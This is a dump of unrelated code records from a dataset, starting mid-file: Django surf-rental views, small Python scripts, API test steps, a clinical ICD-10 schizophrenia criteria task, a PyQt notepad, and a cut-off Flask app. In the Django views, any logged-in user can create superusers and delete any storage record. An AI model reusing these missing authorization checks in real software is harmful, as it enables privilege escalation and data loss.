request.POST.get('sex')\n city = request.POST.get('city')\n street = request.POST.get('street')\n postcode = request.POST.get('postcode')\n country = request.POST.get('country')\n current_user = request.user\n id = current_user.id\n user = User.objects.get(id=id)\n if user.is_superuser == False:\n userprofile = UserProfile.objects.get(user_id=id)\n userprofile.country = country\n userprofile.phone = phone\n userprofile.city = city\n userprofile.sex = sex\n userprofile.street = street\n userprofile.save()\n else:\n userprofile = UserProfile.objects.create(user_id=id, post_code=postcode, birth_date=birth_date, phone=phone,\n sex=sex, city=city, street=street, country=country)\n\n current_user = request.user\n id = current_user.id\n user = User.objects.get(id=id)\n context = {'user': user}\n if user.is_superuser == False:\n userprofile = UserProfile.objects.get(user_id=id)\n p = user.userprofile\n context.update({'personal': p})\n context.update({'phone': p.phone})\n context.update({'sex': p.sex})\n context.update({'city': p.city})\n context.update({'street': p.street})\n context.update({'post': p.post_code})\n context.update({'birth': p.birth_date})\n context.update({'country': p.country})\n current_user = request.user\n id = current_user.id\n user = User.objects.get(id=id)\n\n rentals_wind_board = RentalWindBoard.objects.filter(user_id=id)\n rentals_wind_sail = RentalWindSail.objects.filter(user_id=id)\n rentals_kite_kite = RentalKite.objects.filter(user_id=id)\n rentals_kite_board = RentalKiteBoard.objects.filter(user_id=id)\n storage = Storage.objects.filter(owner_id=id)\n context.update({'rentals_wind_board': rentals_wind_board})\n context.update({'rentals_wind_sail': rentals_wind_sail})\n context.update({'rentals_kite_board': rentals_kite_board})\n context.update({'rentals_kite_kite': rentals_kite_kite})\n\n return render(request, 'profile.html', context)\n\n\n## STORAGE WIND AND KITE\nclass WindStorageView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def get(self, request):\n return render(request, 'storage_wind.html')\n\n def post(self, request):\n type = 'windsurfing'\n board_description = request.POST.get('board_description')\n sail_kite_description = request.POST.get('kite_sail_description')\n sail_or_kite = 1\n photo = request.FILES.get('myphoto')\n current_user = request.user\n id = current_user.id\n print('id', id, 'sail_kite_description', sail_kite_description)\n print(photo)\n if board_description != '' or sail_kite_description != '':\n msg = 'Sprzęt został dodany do pzrechowalni, twój unikalny kod id, dotyczący tego przechowania znajduje się w zakładce PROFIL'\n new = Storage.objects.create(type=type, board_description=board_description,\n sail_kite_description=sail_kite_description, owner_id=id,\n sail_or_kite=sail_or_kite, photo=photo)\n return render(request, 'wind.html', {'msg_storage': msg})\n\n\nclass KiteStorageView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def get(self, request):\n return render(request, 'storage_kite.html')\n\n def post(self, request):\n type = 'kitesurfing'\n board_description = request.POST.get('board_description')\n sail_kite_description = request.POST.get('kite_sail_description')\n sail_or_kite = 2\n photo = request.FILES.get('myphoto')\n current_user = request.user\n id = current_user.id\n if board_description != '' or sail_kite_description != '':\n print('id', id, 'sail_kite_description', sail_kite_description)\n print(photo)\n msg = 'Sprzęt został dodany do pzrechowalni, twój unikalny kod id, dotyczący tego przechowania znajduje się w zakładce PROFIL'\n new = Storage.objects.create(type=type, board_description=board_description,\n sail_kite_description=sail_kite_description, owner_id=id,\n sail_or_kite=sail_or_kite)\n return render(request, 'wind.html', {'msg_storage': msg})\n\n\nclass AddWindSailsView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def get(self, request):\n form = AddWindsailForm()\n sails = WindSail.objects.all()\n return render(request, 'addwindsails.html', {'sails': sails, 'form': form})\n\n def post(self, request):\n form = AddWindsailForm(request.POST)\n if form.is_valid():\n brand = form.cleaned_data['brand']\n description = form.cleaned_data['description']\n size = form.cleaned_data['size']\n form.save()\n sails = WindSail.objects.all()\n return render(request, 'addwindsails.html', {'msg': 'Żagiel dodany do bazy', 'form': form, 'sails': sails})\n\n else:\n return HttpResponseRedirect('/add_windsails/')\n\n\nclass AddWindBoardsView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def get(self, request):\n form = AddWindboardsForm\n boards = WindBoard.objects.all()\n return render(request, 'addwindboards.html', {'form': form, 'boards': boards})\n\n def post(self, request):\n form = AddWindboardsForm(request.POST)\n if form.is_valid():\n brand = form.cleaned_data['brand']\n type = form.cleaned_data['type']\n description = form.cleaned_data['description']\n size = form.cleaned_data['size']\n form.save()\n # new = WindBoard.objects.create(brand=brand, type=type, description=description, size=size)\n boards = WindBoard.objects.all()\n return render(request, 'addwindboards.html',\n {'msg': 'deska dodana do bazy', 'form': form, 'boards': boards})\n\n # brand = request.POST.get('brand')\n # description = request.POST.get('description')\n # size = request.POST.get('size')\n # type = request.POST.get('type')\n else:\n return HttpResponseRedirect('/add_wind_boards/')\n\n\nclass AddKiteBoardsView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def get(self, request):\n form = AddKiteboardsForm\n boards = KiteBoard.objects.all()\n return render(request, 'addkiteboards.html', {'form': form, 'boards': boards})\n\n def post(self, request):\n form = AddKiteboardsForm(request.POST)\n if form.is_valid():\n brand = form.cleaned_data['brand']\n type = form.cleaned_data['type']\n description = form.cleaned_data['description']\n size = form.cleaned_data['size']\n form.save()\n # new = WindBoard.objects.create(brand=brand, type=type, description=description, size=size)\n boards = KiteBoard.objects.all()\n return render(request, 'addkiteboards.html',\n {'msg': 'deska dodana do bazy', 'form': form, 'boards': boards})\n\n # brand = request.POST.get('brand')\n # description = request.POST.get('description')\n # size = request.POST.get('size')\n # type = request.POST.get('type')\n else:\n return HttpResponseRedirect('/add_kiteboards/')\n\n\nclass AddKiteView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def get(self, request):\n form = AddKiteForm()\n kites = KiteKite.objects.all()\n return render(request, 'addkites.html', {'sails': kites, 'form': form})\n\n def post(self, request):\n form = AddKiteForm(request.POST)\n if form.is_valid():\n brand = form.cleaned_data['brand']\n description = form.cleaned_data['description']\n size = form.cleaned_data['size']\n form.save()\n kites = KiteKite.objects.all()\n return render(request, 'addkites.html', {'msg': 'Latawiec dodany do bazy', 'form': form, 'sails': kites})\n\n else:\n return HttpResponseRedirect('/add_kites/')\n\n\nclass AddSuperUserView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def get(self, request):\n form = SignUpFormSuperUser()\n return render(request, 'add_superuser.html', {'form': form})\n\n def post(self, request):\n form = SignUpFormSuperUser(request.POST)\n if form.is_valid():\n form.save()\n\n # username = request.POST.get('username')\n # password1 = request.POST.get('password1')\n # password2 = request.POST.get('password2')\n # last_name = request.POST.get('last_name')\n # first_name = request.POST.get('first_name')\n # email = request.POST.get('email')\n # is_superuser = True\n # new = User.objects.create(last_login=datetime.datetime.now(),username=username, last_name=last_name,\n # first_name=first_name, password=password2, email=email, is_superuser=is_superuser, is_staff=True, is_active=True, date_joined=datetime.datetime.now())\n\n return render(request, 'adminview.html')\n\n\nclass SurfingView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def get(self, request):\n return render(request, 'surfing.html')\n\n\nclass AllStorageView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def get(self, request):\n storage = Storage.objects.all()\n return render(request, 'storage_all.html', {'storage': storage})\n\n def post(self, request):\n storage_id = request.POST.get('storage')\n element = Storage.objects.get(id=storage_id)\n element.delete()\n storage = Storage.objects.all()\n return render(request, 'storage_all.html', {'msg': 'usunięto obiekt', 'storage': storage})\n\n\nclass PriceView(View):\n def get(self, request):\n return render(request, 'pricing_weather.html')\n\n@register.filter\ndef get_item(dictionary, key):\n return dictionary.get(key)\n\n\n","sub_path":"surf_rental/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":25927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"187976791","text":"import os\nimport pickle\nimport sys\nimport jsonpickle\nimport re\n\n\ndef cleanUp(x):\n\treturn x.replace('\"','').lower().strip()\n\ndef importDraft(inputFile):\n\tplayers = {}\n\twith open(inputFile, 'rb') as inFile:\n\t\theader = next(inFile)\n\t\theader = header.split(',')\n\t\tfirst_name_index = 0\n\t\tlast_name_index = 0\n\t\tplayer_score_index = 0\n\t\t\n\t\tfor index, elem in enumerate(header):\n\t\t\telem = cleanUp(elem)\n\t\t\t\n\t\t\tif elem == 'first_name':\n\t\t\t\tfirst_name_index = index\n\t\t\tif elem == 'last_name':\n\t\t\t\tlast_name_index = index\n\t\t\tif elem == 'player_score':\n\t\t\t\tplayer_score_index = index\n\t\t\n\t\tfor record in inFile:\n\t\t\trecord = record.split(',')\n\t\t\trecord = [cleanUp(x) for x in record]\n\t\t\tif len(record) < player_score_index: continue\n\t\t\t\n\t\t\tplayers[record[first_name_index] + ' ' + record[last_name_index]] = record[player_score_index]\n\treturn players\n\ndef saveDraftJSON(players, outputFile):\n\toutputString = jsonpickle.dumps(players)\n\twith open(outputFile, 'wb') as outFile:\n\t\toutFile.write(outputString)\n\nif __name__ == \"__main__\":\n\tinputFile = sys.argv[1];\n\tplayers = importDraft(inputFile)\n\tsaveDraftJSON(players, 'draft.json')","sub_path":"extractDraftFromFile.py","file_name":"extractDraftFromFile.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"157256162","text":"import sys\nimport argparse\nfrom time import sleep\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='arguments')\n parser.add_argument(\"--inputs\", \"-i\", action=\"append\")\n parser.add_argument(\"--outputs\", \"-o\", action=\"append\")\n args = parser.parse_args()\n\n i = 0\n while True:\n i += 1\n print(i)\n sys.stdout.flush()\n sleep(1)\n","sub_path":"asn_server/Demos/system/toyexample/toy.py","file_name":"toy.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"456701998","text":"from aloe import step\nfrom tests.features.steps import api_test_steps\nimport os \n\nlogConfig = {}\n\n@step(r'a response for \"([^\"]*)\" exists')\ndef api_exists(step,apiCall):\n logConfig['apiCall'] = apiCall\n exists = api_test_steps.check_responses_for_call(apiCall)\n assert exists is True\n \n@step(r'create the log directory \"([^\"]*)\"')\ndef create_log_directory(step,path):\n logConfig['logDirPath'] = path\n try:\n os.makedirs(path)\n except:\n print(\"Path {} already exists\".format(path))\n \n@step(r'log the response to the file \"([^\"]*)\"')\ndef create_log_file(step,fileName):\n config = setup_logs(fileName)\n file = config[1]\n response = config[0]\n \n for i in response:\n nodeName = i\n responseVals = \"\" \n for x in response[i]:\n responseVals += \"\\t\" + x + \": \" + str(response[i][x]) + \"\\n\"\n statement = nodeName + \":\\n\" + responseVals\n file.write(statement) \n \n file.close()\n \n \n@step(r'log the neighbor response to the file \"([^\"]*)\"')\ndef create_neighbor_log_file(step,fileName):\n config = setup_logs(fileName)\n file = config[1]\n response = config[0]\n \n for i in response:\n nodeName = i\n for x in response[i]:\n if type(response[i][x]) != int:\n responseVals = \"\"\n for y in range(len(response[i][x])):\n for a in response[i][x][y]: \n responseVals += \"\\t\" + a + \": \" + str(response[i][x][y][a]) + \"\\n\"\n responseVals += \"\\n\"\n \n statement = nodeName + \":\\n\" + responseVals + \"\\n\\n\"\n file.write(statement)\n\n\n@step(r'log the tips response to the file \"([^\"]*)\"')\ndef create_tips_log_file(step,fileName):\n config = setup_logs(fileName)\n file = config[1]\n response = config[0]\n \n for i in response:\n nodeName = i\n responseVals = \"\" \n for x in response[i]:\n responseVals += \"\\n\\t\" + x + \": \" \n if type(response[i][x]) != int:\n #Maximum 250 entries for the log\n responseVals += \"\\n\"\n if len(response[i][x]) > 250:\n max = 250\n else: \n max = len(response[i][x])\n \n for y in range(max):\n responseVals += \"\\t\\tTip: \" + str(response[i][x][y]) + \"\\n\"\n \n else: \n responseVals += str(response[i][x])\n statement = nodeName + \":\\n\" + responseVals\n print(statement)\n \n file.write(statement) \n\n file.close()\n \n\n\n\n\n\n\n\ndef setup_logs(fileName):\n path = logConfig['logDirPath'] + fileName\n file = open(path,'w')\n apiCall = logConfig['apiCall']\n response = api_test_steps.fetch_response(apiCall)\n config = [response,file]\n \n return config\n\n","sub_path":"PythonRegression/tests/features/steps/api_log_steps.py","file_name":"api_log_steps.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"26810842","text":"#!/usr/bin/python2.7\n# -*- encoding: utf8 -*-\n\n\"\"\"\n Copyright (C) 2012-2015 Rudolf Cardinal (rudolf@pobox.com).\n Department of Psychiatry, University of Cambridge.\n Funded by the Wellcome Trust.\n\n This file is part of CamCOPS.\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\n\nimport pythonlib.rnc_web as ws\nfrom cc_modules.cc_constants import DATEFORMAT, PV\nfrom cc_modules.cc_dt import format_datetime_string\nfrom cc_modules.cc_html import (\n get_true_false_none,\n heading_spanning_two_columns,\n subheading_spanning_two_columns,\n tr_qa,\n)\nfrom cc_modules.cc_lang import is_false\nfrom cc_modules.cc_string import WSTRING\nfrom cc_modules.cc_task import (\n CLINICIAN_FIELDSPECS,\n CTV_DICTLIST_INCOMPLETE,\n ICD10_COPYRIGHT_DIV,\n STANDARD_TASK_FIELDSPECS,\n Task,\n)\n\n\n# =============================================================================\n# Icd10Schizophrenia\n# =============================================================================\n\nclass Icd10Schizophrenia(Task):\n A_FIELDSPECS = [\n dict(name=\"passivity_bodily\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"Passivity: delusions of control, influence, or \"\n \"passivity, clearly referred to body or limb movements...\"),\n dict(name=\"passivity_mental\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"(passivity) ... or to specific thoughts, actions, or \"\n \"sensations.\"),\n dict(name=\"hv_commentary\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"Hallucinatory voices giving a running commentary on the \"\n \"patient's behaviour\"),\n dict(name=\"hv_discussing\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"Hallucinatory voices discussing the patient among \"\n \"themselves\"),\n dict(name=\"hv_from_body\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"Other types of hallucinatory voices coming from some \"\n \"part of the body\"),\n dict(name=\"delusions\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"Delusions: persistent delusions of other kinds that are \"\n \"culturally inappropriate and completely impossible, such as \"\n \"religious or political identity, or superhuman powers and \"\n \"abilities (e.g. being able to control the weather, or being in \"\n \"communication with aliens from another world).\"),\n dict(name=\"delusional_perception\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"Delusional perception [a normal perception, \"\n \"delusionally interpreted]\"),\n dict(name=\"thought_echo\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"Thought echo [hearing one's own thoughts aloud, just \"\n \"before, just after, or simultaneously with the thought]\"),\n dict(name=\"thought_withdrawal\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"Thought withdrawal [the feeling that one's thoughts \"\n \"have been removed by an outside agency]\"),\n dict(name=\"thought_insertion\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"Thought insertion [the feeling that one's thoughts have \"\n \"been placed there from outside]\"),\n dict(name=\"thought_broadcasting\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"Thought broadcasting [the feeling that one's thoughts \"\n \"leave oneself and are diffused widely, or are audible to \"\n \"others, or that others think the same thoughts in unison]\"),\n ]\n B_FIELDSPECS = [\n dict(name=\"hallucinations_other\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"Hallucinations: persistent hallucinations in any \"\n \"modality, when accompanied either by fleeting or half-formed \"\n \"delusions without clear affective content, or by persistent \"\n \"over-valued ideas, or when occurring every day for weeks or \"\n \"months on end.\"),\n dict(name=\"thought_disorder\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"Thought disorder: breaks or interpolations in the train \"\n \"of thought, resulting in incoherence or irrelevant speech, or \"\n \"neologisms.\"),\n dict(name=\"catatonia\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"Catatonia: catatonic behaviour, such as excitement, \"\n \"posturing, or waxy flexibility, negativism, mutism, and \"\n \"stupor.\"),\n ]\n C_FIELDSPECS = [\n dict(name=\"negative\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"Negative symptoms: 'negative' symptoms such as marked \"\n \"apathy, paucity of speech, and blunting or incongruity of \"\n \"emotional responses, usually resulting in social withdrawal and \"\n \"lowering of social performance; it must be clear that these are \"\n \"not due to depression or to neuroleptic medication.\"),\n ]\n D_FIELDSPECS = [\n dict(name=\"present_one_month\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"Symptoms in groups A-C present for most of the time \"\n \"during an episode of psychotic illness lasting for at least one \"\n \"month (or at some time during most of the days).\"),\n ]\n E_FIELDSPECS = [\n dict(name=\"also_manic\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"Also meets criteria for manic episode (F30)?\"),\n dict(name=\"also_depressive\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"Also meets criteria for depressive episode (F32)?\"),\n dict(name=\"if_mood_psychosis_first\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"If the patient also meets criteria for manic episode \"\n \"(F30) or depressive episode (F32), the criteria listed above \"\n \"must have been met before the disturbance of mood developed.\"),\n ]\n F_FIELDSPECS = [\n dict(name=\"not_organic_or_substance\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"The disorder is not attributable to organic brain \"\n \"disease (in the sense of F0), or to alcohol- or drug-related \"\n \"intoxication, dependence or withdrawal.\"),\n ]\n G_FIELDSPECS = [\n dict(name=\"behaviour_change\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"A significant and consistent change in the overall \"\n \"quality of some aspects of personal behaviour, manifest as loss \"\n \"of interest, aimlessness, idleness, a self-absorbed attitude, \"\n \"and social withdrawal.\"),\n dict(name=\"performance_decline\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"Marked decline in social, scholastic, or occupational \"\n \"performance.\"),\n ]\n H_FIELDSPECS = [\n dict(name=\"subtype_paranoid\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"PARANOID (F20.0): dominated by delusions or \"\n \"hallucinations.\"),\n dict(name=\"subtype_hebephrenic\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"HEBEPHRENIC (F20.1): dominated by affective changes \"\n \"(shallow, flat, incongruous, or inappropriate affect) and \"\n \"either pronounced thought disorder or aimless, disjointed \"\n \"behaviour is present.\"),\n dict(name=\"subtype_catatonic\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"CATATONIC (F20.2): psychomotor disturbances dominate \"\n \"(such as stupor, mutism, excitement, posturing, negativism, \"\n \"rigidity, waxy flexibility, command automatisms, or verbal \"\n \"perseveration).\"),\n dict(name=\"subtype_undifferentiated\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"UNDIFFERENTIATED (F20.3): schizophrenia with active \"\n \"psychosis fitting none or more than one of the above three \"\n \"types.\"),\n dict(name=\"subtype_postschizophrenic_depression\", cctype=\"BOOL\",\n pv=PV.BIT, comment=\"POST-SCHIZOPHRENIC DEPRESSION \"\n \"(F20.4): in which a depressive episode has developed for at \"\n \"least 2 weeks following a schizophrenic episode within the last \"\n \"12 months and in which schizophrenic symptoms persist but are \"\n \"not as prominent as the depression.\"),\n dict(name=\"subtype_residual\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"RESIDUAL (F20.5): in which previous psychotic episodes \"\n \"of schizophrenia have given way to a chronic condition with \"\n \"'negative' symptoms of schizophrenia for at least 1 year.\"),\n dict(name=\"subtype_simple\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"SIMPLE SCHIZOPHRENIA (F20.6), in which 'negative' \"\n \"symptoms (C) with a change in personal behaviour (D) develop \"\n \"for at least one year without any psychotic episodes (no \"\n \"symptoms from groups A or B or other hallucinations or \"\n \"well-formed delusions), and with a marked decline in social, \"\n \"scholastic, or occupational performance.\"),\n dict(name=\"subtype_cenesthopathic\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"CENESTHOPATHIC (within OTHER F20.8): body image \"\n \"aberration (e.g. desomatization, loss of bodily boundaries, \"\n \"feelings of body size change) or abnormal bodily sensations \"\n \"(e.g. numbness, stiffness, feeling strange, depersonalization, \"\n \"or sensations of pain, temperature, electricity, heaviness, \"\n \"lightness, or discomfort when touched) dominate.\"),\n ]\n A_NAMES = [x[\"name\"] for x in A_FIELDSPECS]\n B_NAMES = [x[\"name\"] for x in B_FIELDSPECS]\n C_NAMES = [x[\"name\"] for x in C_FIELDSPECS]\n D_NAMES = [x[\"name\"] for x in D_FIELDSPECS]\n E_NAMES = [x[\"name\"] for x in E_FIELDSPECS]\n F_NAMES = [x[\"name\"] for x in F_FIELDSPECS]\n G_NAMES = [x[\"name\"] for x in G_FIELDSPECS]\n H_NAMES = [x[\"name\"] for x in H_FIELDSPECS]\n TASK_FIELDSPECS = (\n CLINICIAN_FIELDSPECS\n + [\n dict(name=\"date_pertains_to\", cctype=\"ISO8601\",\n comment=\"Date the assessment pertains to\"),\n dict(name=\"comments\", cctype=\"TEXT\",\n comment=\"Clinician's comments\"),\n ]\n + A_FIELDSPECS\n + B_FIELDSPECS\n + C_FIELDSPECS\n + D_FIELDSPECS\n + E_FIELDSPECS\n + F_FIELDSPECS\n + G_FIELDSPECS\n + H_FIELDSPECS\n )\n\n @classmethod\n def get_tablename(cls):\n return \"icd10schizophrenia\"\n\n @classmethod\n def get_taskshortname(cls):\n return \"ICD10-SZ\"\n\n @classmethod\n def get_tasklongname(cls):\n return u\"ICD-10 criteria for schizophrenia (F20)\"\n\n @classmethod\n def get_fieldspecs(cls):\n return STANDARD_TASK_FIELDSPECS + Icd10Schizophrenia.TASK_FIELDSPECS\n\n def get_clinical_text(self):\n if not self.is_complete():\n return CTV_DICTLIST_INCOMPLETE\n c = self.meets_general_criteria()\n if c is None:\n category = \"Unknown if met or not met\"\n elif c:\n category = \"Met\"\n else:\n category = \"Not met\"\n dl = [{\n \"content\": \"Pertains to: {}. General criteria for \"\n \"schizophrenia: {}.\".format(\n format_datetime_string(self.date_pertains_to,\n DATEFORMAT.LONG_DATE),\n category)\n }]\n if self.comments:\n dl.append({\"content\": ws.webify(self.comments)})\n return dl\n\n def get_summaries(self):\n return [\n self.is_complete_summary_field(),\n dict(name=\"meets_general_criteria\", cctype=\"BOOL\",\n value=self.meets_general_criteria(),\n comment=\"Meets general criteria for paranoid/hebephrenic/\"\n \"catatonic/undifferentiated schizophrenia (F20.0-F20.3)?\"),\n ]\n\n # Meets criteria? These also return null for unknown.\n def meets_general_criteria(self):\n t_a = self.count_booleans(Icd10Schizophrenia.A_NAMES)\n u_a = self.n_incomplete(Icd10Schizophrenia.A_NAMES)\n t_b = self.count_booleans(Icd10Schizophrenia.B_NAMES) + \\\n self.count_booleans(Icd10Schizophrenia.C_NAMES)\n u_b = self.n_incomplete(Icd10Schizophrenia.B_NAMES) + \\\n self.n_incomplete(Icd10Schizophrenia.C_NAMES)\n if t_a + u_a < 1 and t_b + u_b < 2:\n return False\n if self.present_one_month is not None and not self.present_one_month:\n return False\n if ((self.also_manic or self.also_depressive)\n and is_false(self.if_mood_psychosis_first)):\n return False\n if is_false(self.not_organic_or_substance):\n return False\n if ((t_a >= 1 or t_b >= 2)\n and self.present_one_month\n and (\n (is_false(self.also_manic)\n and is_false(self.also_depressive))\n or self.if_mood_psychosis_first\n )\n and self.not_organic_or_substance):\n return True\n return None\n\n def is_complete(self):\n return (\n self.date_pertains_to is not None\n and self.meets_general_criteria() is not None\n and self.field_contents_valid()\n )\n\n def heading_row(self, wstringname, extra=None):\n return heading_spanning_two_columns(\n WSTRING(wstringname) + (extra or \"\")\n )\n\n def text_row(self, wstringname):\n return subheading_spanning_two_columns(WSTRING(wstringname))\n\n def row_true_false(self, fieldname):\n return self.get_twocol_bool_row_true_false(\n fieldname, WSTRING(\"icd10sz_\" + fieldname))\n\n def row_present_absent(self, fieldname):\n return self.get_twocol_bool_row_present_absent(\n fieldname, WSTRING(\"icd10sz_\" + fieldname))\n\n def get_task_html(self):\n h = self.get_standard_clinician_block(True, self.comments) + u\"\"\"\n
    \n \n \"\"\" + self.get_is_complete_tr()\n h += tr_qa(WSTRING(\"date_pertains_to\"),\n format_datetime_string(self.date_pertains_to,\n DATEFORMAT.LONG_DATE, default=None))\n h += tr_qa(WSTRING(\"icd10sz_meets_general_criteria\")\n + u\" [1]\",\n get_true_false_none(self.meets_general_criteria()))\n h += u\"\"\"\n
    \n
    \n
    \n \"\"\"\n h += WSTRING(\"icd10sz_comments\")\n h += u\"\"\"\n
    \n \n \n \n \n \n \"\"\"\n\n h += self.heading_row(\"icd10sz_core\", \" [2]\")\n for x in Icd10Schizophrenia.A_NAMES:\n h += self.row_present_absent(x)\n\n h += self.heading_row(\"icd10sz_other_positive\")\n for x in Icd10Schizophrenia.B_NAMES:\n h += self.row_present_absent(x)\n\n h += self.heading_row(\"icd10sz_negative_title\")\n for x in Icd10Schizophrenia.C_NAMES:\n h += self.row_present_absent(x)\n\n h += self.heading_row(\"icd10sz_other_criteria\")\n for x in Icd10Schizophrenia.D_NAMES:\n h += self.row_true_false(x)\n h += self.text_row(\"icd10sz_duration_comment\")\n for x in Icd10Schizophrenia.E_NAMES:\n h += self.row_true_false(x)\n h += self.text_row(\"icd10sz_affective_comment\")\n for x in Icd10Schizophrenia.F_NAMES:\n h += self.row_true_false(x)\n\n h += self.heading_row(\"icd10sz_simple_title\")\n for x in Icd10Schizophrenia.G_NAMES:\n h += self.row_present_absent(x)\n\n h += self.heading_row(\"icd10sz_subtypes\")\n for x in Icd10Schizophrenia.H_NAMES:\n h += self.row_present_absent(x)\n\n h += u\"\"\"\n
    QuestionAnswer
    \n
    \n [1] All of:\n (a) at least one core symptom, or at least two of the other\n positive or negative symptoms;\n (b) present for a month (etc.);\n (c) if also manic/depressed, schizophreniform psychosis\n came first;\n (d) not attributable to organic brain disease or\n psychoactive substances.\n [2] Symptom definitions from:\n (a) Oyebode F (2008). Sims’ Symptoms in the Mind: An\n Introduction to Descriptive Psychopathology. Fourth\n edition, Saunders, Elsevier, Edinburgh.\n (b) Pawar AV & Spence SA (2003), PMID 14519605.\n
    \n \"\"\" + ICD10_COPYRIGHT_DIV\n return h\n","sub_path":"server/tasks/icd10schizophrenia.py","file_name":"icd10schizophrenia.py","file_ext":"py","file_size_in_byte":17342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"470953602","text":"# -*- coding: utf-8 -*-\n#! /usr/bin/python\n\nimport sys\nimport os\nfrom PyQt4 import QtGui\nfrom PyQt4.QtCore import Qt\n\nimport design2\n\nclass Notepad(QtGui.QMainWindow, design2.Ui_MainWindow):\n def __init__(self, parent=None):\n super(Notepad, self).__init__(parent)\n\n self.filename = \"\"\n\n self.setupUi(self)\n\n\n self.closeAction.triggered.connect(self.close)\n self.newAction.triggered.connect(self.newFile) \n self.saveAction.triggered.connect(self.saveFile) \n self.openAction.triggered.connect(self.openFile)\n\n self.printAction.triggered.connect(self.printHandler)\n self.previewAction.triggered.connect(self.preview)\n\n\n def newFile(self):\n #self.textEdit.clear()\n spawn = Notepad(self)\n spawn.show()\n\n \n def saveFile(self):\n \n # Only open dialog if there is no filename yet\n if not self.filename:\n self.filename = QtGui.QFileDialog.getSaveFileName(self, 'Save File','.')\n\n # Append extension if not there yet if you use python3:\n # if not self.filename.endswith(\".wrt\"):\n if not self.filename.endsWith(\".wrt\"):\n self.filename += \".wrt\"\n\n # We just store the contents of the text file along with the\n # format in html, which Qt does in a very nice way for us\n with open(self.filename,\"wt\") as file:\n file.write(self.textEdit.toHtml())\n\n def openFile(self):\n # Get filename and show only .writer files\n self.filename = QtGui.QFileDialog.getOpenFileName(self, 'Open File',\".\",filter= \"All (*);;txt(*.wrt *.txt)\")\n\n if self.filename:\n with open(self.filename,\"rt\") as file:\n self.textEdit.setText(file.read())\n\n def preview(self):\n\n # Open preview dialog\n preview = QtGui.QPrintPreviewDialog()\n\n # If a print is requested, open print dialog\n preview.paintRequested.connect(lambda p: self.textEdit.print_(p))\n\n preview.exec_()\n\n def printHandler(self):\n\n # Open printing dialog\n dialog = QtGui.QPrintDialog()\n\n if dialog.exec_() == QtGui.QDialog.Accepted:\n self.textEdit.document().print_(dialog.printer())\n\ndef main():\n app = QtGui.QApplication(sys.argv)\n form = Notepad()\n form.show()\n app.exec_()\n\nif __name__ == '__main__':\n main()","sub_path":"unit_05/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"550828668","text":"from flask import Flask, request, jsonify\nfrom pymongo import MongoClient\nimport json\n\nFRUIT_LIST = ['banana', 'apple', 'orange', 'strawberry']\nVEGETABLE_LIST = ['cucumber', 'beetroot', 'carrot', 'celery']\n\napp = Flask(__name__)\napp.config.from_object('config.DevelopmentConfig')\n\ndef get_db():\n client = MongoClient(app.config['DB_HOST'], app.config['DB_PORT'])\n db = client[app.config['DB_NAME']]\n return client, db\n\n@app.before_first_request\ndef init_db():\n client, db = get_db()\n\n resource_path = app.config['RESOURCES_PATH']\n\n companies_collection = db['companies']\n companies = 